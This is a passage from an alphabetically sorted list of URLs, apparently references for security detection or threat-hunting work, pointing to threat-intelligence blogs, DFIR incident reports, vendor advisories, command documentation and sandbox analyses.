/\nhttps://redcanary.com/blog/msix-installers/\nhttps://redcanary.com/blog/raspberry-robin/\nhttps://redcanary.com/blog/rclone-mega-extortion/\nhttps://redcanary.com/blog/right-to-left-override/\nhttps://redcanary.com/blog/yellow-cockatoo/\nhttps://redcanary.com/threat-detection-report/\nhttps://redcanary.com/threat-detection-report/threats/cobalt-strike/\nhttps://redcanary.com/threat-detection-report/threats/dridex/\nhttps://redcanary.com/threat-detection-report/threats/qbot/\nhttps://redcanary.com/threat-detection-report/threats/socgholish/#threat-socgholish\nhttps://redmimicry.com\nhttps://redmimicry.com/posts/redmimicry-winnti/\nhttps://redmimicry.com/posts/redmimicry-winnti/#dropper\nhttps://regex101.com/r/RugQYK/1\nhttps://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index\nhttps://reqrypt.org/windivert-doc.html\nhttps://res.armor.com/resources/threat-intelligence/astaroth-banking-trojan/\nhttps://research.checkpoint.com/2020/apache-guacamole-rce/\nhttps://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\nhttps://research.checkpoint.com/2022/evilplayout-attack-against-irans-state-broadcaster/\nhttps://research.checkpoint.com/2023/beyond-the-horizon-traveling-the-world-on-camaro-dragons-usb-flash-drives/\nhttps://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/\nhttps://research.checkpoint.com/2023/malware-spotlight-camaro-dragons-tinynote-backdoor/\nhttps://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/\nhttps://research.checkpoint.com/2023/rorschach-a-new-sophisticated-and-fast-ransomware/\nhttps://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/\nhttps://research.checkpoint.com/ryuk-ransomware-targeted-campaign-break/\nhttps://research.eye.security/sharepoint-under-siege/\nhttps://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/\nhttps://research.nccgroup.com/2018/05/18/emissary-panda-a-potential-new-malicious-tool/\nhttps://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/\nhttps://research.nccgroup.com/2020/07/10/rift-citrix-adc-vulnerabilities-cve-2020-8193-cve-2020-8195-and-cve-2020-8196-intelligence/\nhttps://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/\nhttps://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nhttps://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/\nhttps://research.nccgroup.com/2022/07/13/climbing-mount-everest-black-byte-bytes-back/\nhttps://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/\nhttps://research.splunk.com/cloud/c783dd98-c703-4252-9e8a-f19d9f5c949e/\nhttps://research.splunk.com/cloud/e155876a-6048-11eb-ae93-0242ac130002/\nhttps://research.splunk.com/endpoint/07921114-6db4-4e2e-ae58-3ea8a52ae93f/\nhttps://research.splunk.com/endpoint/10399c1e-f51e-11eb-b920-acde48001122/\nhttps://research.splunk.com/endpoint/linux_doas_conf_file_creation/\nhttps://research.splunk.com/endpoint/linux_doas_tool_execution/\nhttps://research.splunk.com/endpoint/windows_possible_credential_dumping/\nhttps://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/\nhttps://researchcenter.paloaltonetworks.com/2018/02/unit42-sofacy-attacks-multiple-government-entities/\nhttps://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/\nhttps://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/\nhttps://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/\nhttps://restic.readthedocs.io/en/stable/030_preparing_a_new_repo.html\nhttps://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/\nhttps://rhinosecuritylabs.com/research/cve-2024-1212unauthenticated-command-injection-in-progress-kemp-loadmaster/\nhttps://room362.com/post/2013/2013-06-10-volume-shadow-copy-ntdsdit-domain-hashes-remotely-part-1/\nhttps://rules.sonarsource.com/java/RSPEC-2755\nhttps://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/\nhttps://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/\nhttps://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/\nhttps://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/\nhttps://sdmsoftware.com/general-stuff/launching-the-new-gp-management-editor-from-the-command-line/\nhttps://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/\nhttps://sec-consult.com/blog/detail/pentesters-windows-ntfs-tricks-collection/\nhttps://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z\nhttps://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection\nhttps://sec.okta.com/fastpassphishingdetection\nhttps://secariolabs.com/research/analysing-and-reproducing-poc-for-log4j-2-15-0\nhttps://secjoes-reports.s3.eu-central-1.amazonaws.com/Sockbot%2Bin%2BGoLand.pdf\nhttps://seclists.org/fulldisclosure/2020/Mar/45\nhttps://seclists.org/fulldisclosure/2023/Jan/1\nhttps://securelist.com/andariel-deploys-dtrack-and-maui-ransomware/107063/\nhttps://securelist.com/apt-luminousmoth/103332/\nhttps://securelist.com/apt-slingshot/84312/\nhttps://securelist.com/blog/research/77725/from-shamoon-to-stonedrill/\nhttps://securelist.com/chafer-used-remexi-malware/89538/\nhttps://securelist.com/defttorero-tactics-techniques-and-procedures/107610/\nhttps://securelist.com/faq-the-projectsauron-apt/75533/\nhttps://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/\nhttps://securelist.com/lazarus-covets-covid-19-related-intelligence/99906/\nhttps://securelist.com/lazarus-on-the-hunt-for-big-game/97757/\nhttps://securelist.com/locked-out/68960/\nhttps://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/\nhttps://securelist.com/muddywater/88059/\nhttps://securelist.com/my-name-is-dtrack/93338/\nhttps://securelist.com/network-tunneling-with-qemu/111803/\nhttps://securelist.com/operation-triangulation/109842/\nhttps://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831\nhttps://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/\nhttps://securelist.com/schroedingers-petya/78870/\nhttps://securelist.com/the-epic-turla-operation/65545/\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\nhttps://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/\nhttps://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/\nhttps://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/new-teslacrypt-ransomware-arrives-via-spam/\nhttps://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708/\nhttps://security.padok.fr/en/blog/kubernetes-webhook-attackers\nhttps://security.paloaltonetworks.com/CVE-2024-3400\nhttps://security.stackexchange.com/questions/210843/is-it-possible-to-change-original-filename-of-an-exe\nhttps://securityaffairs.co/wordpress/133680/malware/dll-sideloading-spread-qakbot.html\nhttps://securityboulevard.com/2019/08/agent-tesla-evading-edr-by-removing-api-hooks/\nhttps://securityboulevard.com/2019/09/deobfuscating-ostap-trickbots-34000-line-javascript-downloader/\nhttps://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2\nhttps://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/\nhttps://securitydatasets.com/notebooks/atomic/windows/credential_access/SDWIN-201020013208.html\nhttps://securitydatasets.com/notebooks/atomic/windows/defense_evasion/SDWIN-201017061100.html\nhttps://securitydatasets.com/notebooks/atomic/windows/lateral_movement/SDWIN-200806015757.html?highlight=create%20file\nhttps://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/\nhttps://securityintelligence.com/x-force/x-force-hive0129-targeting-financial-institutions-latam-banking-trojan/\nhttps://securityjosh.github.io/2020/04/23/Mute-Sysmon.html\nhttps://securitylab.github.com/research/octopus-scanner-malware-open-source-supply-chain\nhttps://securityliterate.com/how-malware-abuses-the-zone-identifier-to-circumvent-detection-and-analysis/\nhttps://securityscorecard.com/research/deep-dive-into-alphv-blackcat-ransomware\nhttps://securityxploded.com/\nhttps://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/\nhttps://sensepost.com/blog/2024/dumping-lsa-secrets-a-story-about-task-decorrelation/\nhttps://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468\nhttps://services.google.com/fh/files/blogs/gcat_threathorizons_full_apr2023.pdf\nhttps://shellgeek.com/useraccountcontrol-flags-to-manipulate-properties/\nhttps://social.msdn.microsoft.com/Forums/vstudio/en-US/0878832e-39d7-4eaf-8e16-a729c4c40975/what-can-i-use-e13c0d23ccbc4e12931bd9cc2eee27e4-for?forum=clr\nhttps://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx\nhttps://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/\nhttps://sourceforge.net/projects/mouselock/\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=58\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=7\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=74\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=76\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=79\nhttps://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=8\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=41\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=42\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65\nhttps://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66\nhttps://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment\nhttps://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43\nhttps://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf\nhttps://splintercod3.blogspot.com/p/the-hidden-side-of-seclogon-part-3.html\nhttps://squiblydoo.blog/2023/11/07/october-2023-solarmarker/\nhttps://ss64.com/bash/rar.html\nhttps://ss64.com/mac/chflags.html\nhttps://ss64.com/mac/hdiutil.html\nhttps://ss64.com/mac/system_profiler.html\nhttps://ss64.com/nt/cmd.html\nhttps://ss64.com/nt/dsacls.html\nhttps://ss64.com/nt/for.html\nhttps://ss64.com/nt/logman.html\nhttps://ss64.com/nt/mklink.html\nhttps://ss64.com/nt/net-service.html\nhttps://ss64.com/nt/netsh.html\nhttps://ss64.com/nt/regsvr32.html\nhttps://ss64.com/nt/shell.html\nhttps://ss64.com/nt/syntax-redirection.html\nhttps://ss64.com/osx/csrutil.html\nhttps://ss64.com/osx/dscl.html\nhttps://ss64.com/osx/dseditgroup.html\nhttps://ss64.com/osx/dsenableroot.html\nhttps://ss64.com/osx/osacompile.html\nhttps://ss64.com/osx/sysadminctl.html\nhttps://ss64.com/ps/foreach-object.html\nhttps://ssd-disclosure.com/ssd-advisory-common-log-file-system-clfs-driver-pe/\nhttps://stackoverflow.com/questions/20010199/how-to-determine-if-a-process-runs-inside-lxc-docker\nhttps://stackoverflow.com/questions/25892194/does-rails-come-with-a-not-authorized-exception\nhttps://stackoverflow.com/questions/42442320/ssh-tunnel-to-ngrok-and-initiate-rdp\nhttps://stealthbits.com/blog/extracting-password-hashes-from-the-ntds-dit-file/\nhttps://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation\nhttps://steemit.com/utopian-io/@ah101/uac-bypassing-utility\nhttps://stefanos.cloud/blog/kb/how-to-clear-the-powershell-command-history/\nhttps://steflan-security.com/windows-privilege-escalation-credential-harvesting/\nhttps://streamable.com/q2dsji\nhttps://strontic.github.io/xcyclopedia/library/aclui.dll-F883E9CA757B622B032FDCA5BF33D0DF.html\nhttps://strontic.github.io/xcyclopedia/library/clsid_C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6.html\nhttps://strontic.github.io/xcyclopedia/library/DeviceEnroller.exe-24BEF0D6B0ECED36BB41831759FDE18D.html\nhttps://strontic.github.io/xcyclopedia/library/dialer.exe-0B69655F912619756C704A0BF716B61F.html\nhttps://strontic.github.io/xcyclopedia/library/iexpress.exe-D594B2A33EFAFD0EABF09E3FDC05FCEA.html\nhttps://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html\nhttps://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html\nhttps://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html\nhttps://strontic.github.io/xcyclopedia/library/pnputil.exe-60EDC5E6BDBAEE441F2E3AEACD0340D2.html\nhttps://strontic.github.io/xcyclopedia/library/setres.exe-0E30E4C09637D7A128A37B59A3BC4D09.html\nhttps://strontic.github.io/xcyclopedia/library/shell32.dll-65DA072F25DE83D9F83653E3FEA3644D.html\nhttps://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html\nhttps://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf\nhttps://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html\nhttps://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu\nhttps://support.anydesk.com/Automatic_Deployment\nhttps://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web\nhttps://support.atlassian.com/security-and-access-policies/docs/export-user-accounts\nhttps://support.citrix.com/article/CTX267027\nhttps://support.citrix.com/article/CTX267679\nhttps://support.citrix.com/article/CTX276688\nhttps://support.citrix.com/article/CTX579459/netscaler-adc-and-netscaler-gateway-security-bulletin-for-cve20234966-and-cve20234967\nhttps://support.f5.com/csp/article/K52145254\nhttps://support.google.com/a/answer/9261439\nhttps://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc\nhttps://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048\nhttps://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738\nhttps://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16\nhttps://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d\nhttps://support.microsoft.com/en-us/topic/microsoft-security-advisory-update-to-improve-credentials-protection-and-management-may-13-2014-93434251-04ac-b7f3-52aa-9f951c14b649\nhttps://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us\nhttps://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7\nhttps://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1000776\nhttps://support.solarwinds.com/SuccessCenter/s/article/Configure-ESXi-Syslog-to-LEM?language=en_US\nhttps://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html\nhttps://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575\nhttps://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b\nhttps://swarm.ptsecurity.com/unauth-rce-vmware\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/blackbyte-exbyte-ransomware\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/greenbug-espionage-telco-south-asia\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/lazarus-dream-job-chemical\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/seedworm-apt-iran-middle-east\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/yanluowang-ransomware-attacks-continue\nhttps://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia\nhttps://sysdig.com/blog/mitre-defense-evasion-falco\nhttps://systeminformer.sourceforge.io/\nhttps://t.co/ezOTGy1a1G\nhttps://taggart-tech.com/quasar-electron/\nhttps://taiwan.postsen.com/business/88601/Hamas-hackers-use-data-destruction-software-BiBi-which-consumes-a-lot-of-processor-resources-to-wipe-Windows-computer-data--iThome.html\nhttps://talesfrominfosec.blogspot.com/2017/12/killing-sysmon-silently.html\nhttps://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma\nhttps://teamhydra.blog/2020/08/25/bypassing-credential-guard/\nhttps://techcommunity.microsoft.com/t5/core-infrastructure-and-security/windows-10-controlled-folder-access-event-search/ba-p/2326088\nhttps://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465\nhttps://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726\nhttps://techcommunity.microsoft.com/t5/microsoft-entra-blog/introducing-windows-local-administrator-password-solution-with/ba-p/1942487\nhttps://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\nhttps://techcommunity.microsoft.com/t5/sysinternals-blog/zoomit-v7-1-procdump-2-0-for-linux-process-explorer-v17-05/ba-p/3884766\nhttps://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947\nhttps://techgenix.com/malicious-powershell-scripts-evade-detection/\nhttps://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx\nhttps://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx\nhttps://technet.microsoft.com/en-us/library/cc742154(v=ws.11).aspx\nhttps://technet.microsoft.com/en-us/library/cc754243(v=ws.11).aspx\nhttps://technet.microsoft.com/en-us/library/security/4022344\nhttps://techtalk.pcmatic.com/2017/11/30/running-dll-files-malware-analysis/\nhttps://the.earth.li/~sgtatham/putty/0.58/htmldoc/Chapter7.html\nhttps://thecyberexpress.com/ukraine-hit-by-meshagent-malware-campaign/\nhttps://thedfirreport.com/2020/04/20/sqlserver-or-the-miner-in-the-basement/\nhttps://thedfirreport.com/2020/05/08/adfind-recon/\nhttps://thedfirreport.com/2020/06/21/snatch-ransomware/\nhttps://thedfirreport.com/2020/10/08/ryuks-return\nhttps://thedfirreport.com/2020/10/08/ryuks-return/\nhttps://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\nhttps://thedfirreport.com/2020/11/23/pysa-mespinoza-ransomware/\nhttps://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/\nhttps://thedfirreport.com/2021/01/18/all-that-for-a-coinminer\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware\nhttps://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/\nhttps://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/\nhttps://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/\nhttps://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nhttps://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\nhttps://thedfirreport.com/2021/10/18/icedid-to-xinglocker-ransomware-in-24-hours/\nhttps://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/\nhttps://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/\nhttps://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/\nhttps://thedfirreport.com/2021/12/13/diavol-ransomware/\nhttps://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\nhttps://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/\nhttps://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/\nhttps://thedfirreport.com/2022/04/04/stolen-images-campaign-ends-in-conti-ransomware/\nhttps://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/\nhttps://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/\nhttps://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/\nhttps://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/\nhttps://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\nhttps://thedfirreport.com/2022/09/26/bumblebee-round-two/\nhttps://thedfirreport.com/2022/10/31/follina-exploit-leads-to-domain-compromise/\nhttps://thedfirreport.com/2022/11/14/bumblebee-zeros-in-on-meterpreter/\nhttps://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/\nhttps://thedfirreport.com/2023/01/09/unwrapping-ursnifs-gifts/\nhttps://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/\nhttps://thedfirreport.com/2023/03/06/2022-year-in-review/\nhttps://thedfirreport.com/2023/05/22/icedid-macro-ends-in-nokoyawa-ransomware/\nhttps://thedfirreport.com/2023/08/28/html-smuggling-leads-to-domain-wide-ransomware/\nhttps://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/\nhttps://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/#detections\nhttps://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/\nhttps://thedfirreport.com/2025/06/30/hide-your-rdp-password-spray-leads-to-ransomhub-deployment/\nhttps://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html\nhttps://thehackernews.com/2024/01/systembc-malwares-c2-server-analysis.html\nhttps://thehackernews.com/2024/03/github-rolls-out-default-secret.html\nhttps://thehackernews.com/2024/03/two-chinese-apt-groups-ramp-up-cyber.html\nhttps://thehackernews.com/2024/12/cisa-and-fbi-raise-alerts-on-exploited.html\nhttps://thehackernews.com/2025/03/unpatched-windows-zero-day-flaw.html\nhttps://therecord.media/cisa-warns-of-zoho-server-zero-day-exploited-in-the-wild/\nhttps://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/\nhttps://thewover.github.io/Introducing-Donut/\nhttps://threadreaderapp.com/thread/1533879688141086720.html\nhttps://threathunterplaybook.com/hunts/windows/170105-LSASSMemoryReadAccess/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/180719-DLLProcessInjectionCreateRemoteThread/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190410-LocalPwshExecution/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190510-RegModWDigestDowngrade/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190625-RegKeyAccessSyskey/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190725-SAMRegistryHiveHandleRequest/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190811-WMIModuleLoad/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190815-RemoteServiceInstallation/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/190826-RemoteSCMHandle/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/200902-RemoteWMIActiveScriptEventConsumers/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html\nhttps://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html\nhttps://threathunterplaybook.com/library/windows/active_directory_replication.html\nhttps://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/\nhttps://threatpost.com/microsoft-petitpotam-poc/168163/\nhttps://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/\nhttps://tools.ietf.org/html/rfc2929#section-2.1\nhttps://tools.thehacker.recipes/mimikatz/modules\nhttps://tools.thehacker.recipes/mimikatz/modules/dpapi/credhist\nhttps://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]\nhttps://tria.ge/220422-1nnmyagdf2/\nhttps://tria.ge/220422-1pw1pscfdl/\nhttps://tria.ge/231004-tp8k6sch9t/behavioral2\nhttps://tria.ge/240123-rapteaahhr/behavioral1\nhttps://tria.ge/240225-jlylpafb24/behavioral1/analog?main_event=Registry&op=SetValueKeyInt\nhttps://tria.ge/240226-fhbe7sdc39/behavioral1\nhttps://tria.ge/240301-rk34sagf5x/behavioral2\nhttps://tria.ge/240307-1hlldsfe7t/behavioral2/analog?main_event=Registry&op=SetValueKeyInt\nhttps://tria.ge/240521-ynezpagf56/behavioral1\nhttps://trustedsec.com/blog/adexplorer-on-engagements\nhttps://trustedsec.com/blog/oops-i-udld-it-again\nhttps://trustedsec.com/blog/specula-turning-outlook-into-a-c2-with-one-registry-change\nhttps://trustedsec.com/blog/wmi-for-script-kiddies\nhttps://twitter.com/0gtweet/status/1182516740955226112\nhttps://twitter.com/0gtweet/status/1206692239839289344\nhttps://twitter.com/0gtweet/status/1281103918693482496\nhttps://twitter.com/0gtweet/status/1299071304805560321?s=21\nhttps://twitter.com/0gtweet/status/1354766164166115331\nhttps://twitter.com/0gtweet/status/1359039665232306183?s=21\nhttps://twitter.com/0gtweet/status/1457676633809330184\nhttps://twitter.com/0gtweet/status/1465282548494487554\nhttps://twitter.com/0gtweet/status/1468548924600459267\nhttps://twitter.com/0gtweet/status/1474899714290208777?s=12\nhttps://twitter.com/0gtweet/status/1476286368385019906\nhttps://twitter.com/0gtweet/status/1477925112561209344\nhttps://twitter.com/0gtweet/status/1493963591745220608?s=20&t=xUg9DsZhJy1q9bPTUWgeIQ\nhttps://twitter.com/0gtweet/status/1526833181831200770\nhttps://twitter.com/0gtweet/status/1560732860935729152\nhttps://twitter.com/0gtweet/status/1564968845726580736\nhttps://twitter.com/0gtweet/status/1583356502340870144\nhttps://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA\nhttps://twitter.com/0gtweet/status/1602644163824156672?s=20&t=kuxbUnZPltpvFPZdCrqPXA\nhttps://twitter.com/0gtweet/status/1628720819537936386\n